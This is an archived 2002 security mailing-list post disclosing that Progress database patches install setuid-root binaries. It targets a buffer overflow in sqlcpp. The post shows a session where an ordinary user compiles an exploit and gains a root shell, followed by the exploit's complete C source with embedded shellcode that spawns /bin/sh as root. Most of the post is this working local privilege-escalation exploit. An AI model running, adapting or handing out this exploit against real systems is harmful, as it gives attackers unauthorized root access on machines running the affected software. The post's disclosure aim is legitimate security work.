Progress Setuid patch Installs (Happy Easter or April fools to Progress)

From: KF (dotslashat_private)
Date: Mon Apr 01 2002 - 09:28:55 PST

Next message: KF: "Progress Setuid patch Installs (Happy Easter or April fools to Progress)"

Previous message: Michael H. Warfield: "Re: RCA cable modem Deny of Service"
Next in thread: KF: "Progress Setuid patch Installs (Happy Easter or April fools to Progress)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

http://online.securityfocus.com/archive/82/263602

I sent this out a week or so ago to vuln-dev ... there was never a bid 
number written up on it so I figured I would stress the problem again. I 
mailed this to Progress tech support and they failed to respond as usual 
so maybe this will get them in gear.
Its not like I haven't told them how to fix this at least once.

[root@ghetto finished]# ls -al /usr/dlc/bin/sqlcpp
-rwsrwsr-x    1 root     root      2220918 Oct 23 08:59 /usr/dlc/bin/sqlcpp

Progress likes to include alot of suids in their patches... and they 
GIVE them to you even if you don't use the software.
sqlcpp was NOT part of my install until I patched my box. Thanks for the 
root security hole guys and STOP using p_stcopy()!

[root@localhost root]# tar tzvf 91C09.tar.Z  | grep ws
-rwsrwxr-x patchbld/rdl 1001997 2002-02-26 08:16:49 bin/_dbutil
-rwsrwxr-x patchbld/rdl 1124797 2002-02-26 08:16:51 bin/_mprosrv
-rwsrwxr-x patchbld/rdl 1540931 2002-02-26 08:16:52 bin/_mprshut
-rwsrwxr-x patchbld/rdl  413694 2002-02-26 08:16:53 bin/_orasrv
-rwsrwxr-x patchbld/rdl 4770560 2002-02-26 08:16:56 bin/_proapsv
-rwsrwxr-x patchbld/rdl  268161 2002-02-26 08:16:57 bin/_probrkr
-rwsrwxr-x patchbld/rdl 4260172 2002-02-26 08:17:00 bin/_probuild
-rwsrwxr-x patchbld/rdl 4614600 2002-02-26 08:17:05 bin/_progres
-rwsrwxr-x patchbld/rdl  311275 2002-02-26 08:17:06 bin/_prooibk
-rwsrwxr-x patchbld/rdl 2220962 2002-02-26 08:17:08 bin/_prooidv
-rwsrwxr-x patchbld/rdl 1692954 2002-02-26 08:17:10 bin/_proutil
-rwsrwxr-x patchbld/rdl 1126861 2002-02-26 08:17:12 bin/_rfutil
-rwsrwxr-x patchbld/rdl 4580488 2002-02-26 08:17:26 bin/orarx
-rwsrwxr-x patchbld/rdl 2222278 2002-02-26 08:17:30 bin/sqlcpp

Much thanks to "The Itch" and his great work.

[dotslash@ghetto misc]$ id
uid=501(dotslash) gid=501(dotslash) groups=501(dotslash)
[dotslash@ghetto misc]$ cc -o sqlcppx sqlcppx.c
[dotslash@ghetto misc]$ ./sqlcppx
/usr/dlc/bin/sqlcpp
Vulnerability found by KF / http://www.snosoft.com
Coded by The Itch / http://www.promisc.org

Using return address: 0xbffffae4
Using buffersize    : 60
sh-2.05# id
uid=0(root) gid=501(dotslash) groups=501(dotslash)

-KF



/*
 * Yet another Progress Database exploit (version ??)
 *
 * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
 * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
 *
 * This exploit was developed on the Snosoft vulnerability research machines
 * mail dotslashat_private if you are interested in contributing research time
 *
 * - The Itch
 * - itchieat_private
 *
 * - Technical details concerning the exploit -
 *
 * 1). Buffer overflow occurs after writing more then 56 bytes into the buffer at the command line
 *     (56 to overwrite ebp, 60 to overwrite eip).
 * 2). If you write more then 65 bytes, other frames will be overwritten afterwards and will mess up
 *     your flow of arbitrary code execution.
 */

#include <stdio.h>
#include <stdlib.h>

#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90

#define DEFAULT_BUFFER_SIZE 60

char shellcode[] =
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[])
{
        char *buff;
        char *egg;
        char *ptr;
        long *addr_ptr;
        long addr;
        int bsize = DEFAULT_BUFFER_SIZE;
        int eggsize = DEFAULT_EGG_SIZE;
        int i;
        int get_sp = (int)&get_sp;

        if(argc > 1) { bsize = atoi(argv[1]); }

        if(!(buff = malloc(bsize)))
        {
                printf("unable to allocate memory for %d bytes\n", bsize);
                exit(1);
        }

        if(!(egg = malloc(eggsize)))
        {
                printf("unable to allocate memory for %d bytes\n", eggsize);
                exit(1);
        }

        printf("/usr/dlc/bin/sqlcpp\n");
        printf("Vulnerability found by KF / http://www.snosoft.com\n");
        printf("Coded by The Itch / http://www.promisc.org\n\n");
        printf("Using return address: 0x%x\n", get_sp);
        printf("Using buffersize    : %d\n", bsize);

        ptr = buff;
        addr_ptr = (long *) ptr;
        for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }

        ptr = egg;
        for(i = 0; i < eggsize - strlen(shellcode) -1; i++)
        {
                *(ptr++) = NOP;
        }

        for(i = 0; i < strlen(shellcode); i++)
        {
                *(ptr++) = shellcode[i];
        }

        egg[eggsize - 1] = '\0';
        memcpy(egg, "EGG=", 4);
        putenv(egg);

        execl("/usr/dlc/sqlcpp", "sqlcpp", buff, 0);

        return 0;
}

Next message: KF: "Progress Setuid patch Installs (Happy Easter or April fools to Progress)"
Previous message: Michael H. Warfield: "Re: RCA cable modem Deny of Service"
Next in thread: KF: "Progress Setuid patch Installs (Happy Easter or April fools to Progress)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Apr 01 2002 - 13:00:33 PST